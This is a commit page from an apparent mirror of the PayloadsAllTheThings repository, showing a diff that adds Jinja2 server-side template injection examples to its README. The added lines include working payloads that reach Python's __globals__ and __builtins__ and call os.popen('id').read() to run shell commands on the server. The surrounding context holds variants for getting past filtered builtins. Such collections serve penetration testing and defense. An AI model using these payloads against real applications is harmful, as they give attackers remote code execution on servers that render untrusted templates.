ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 10:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

SSTI: add some jinja2 examples

Browse Source
This commit is contained in:
Alexandre ZANNI 2023-01-28 15:29:54 +01:00 committed by GitHub
parent d0067e13d5
commit 89782643c9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
Server Side Template Injection/README.md
View File

@ -471,6 +471,12 @@ Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
{{ ''.__class__.__mro__[2].__subclasses__() }} {{ ''.__class__.__mro__[2].__subclasses__() }}
``` ```
Access `__globals__` and `__builtins__`:
```python
{{ self.__init__.__globals__.__builtins__ }}
```
### Jinja2 - Dump all config variables ### Jinja2 - Dump all config variables
```python ```python
@ -523,7 +529,11 @@ def hook(*args, **kwargs):
#### Exploit the SSTI by calling os.popen().read() #### Exploit the SSTI by calling os.popen().read()
These payloads are context-free, and do not require anything, except being in a jinja2 Template object: ```python
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
```
But when `__builtins__` is filtered, the following payloads are context-free, and do not require anything, except being in a jinja2 Template object:
```python ```python
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}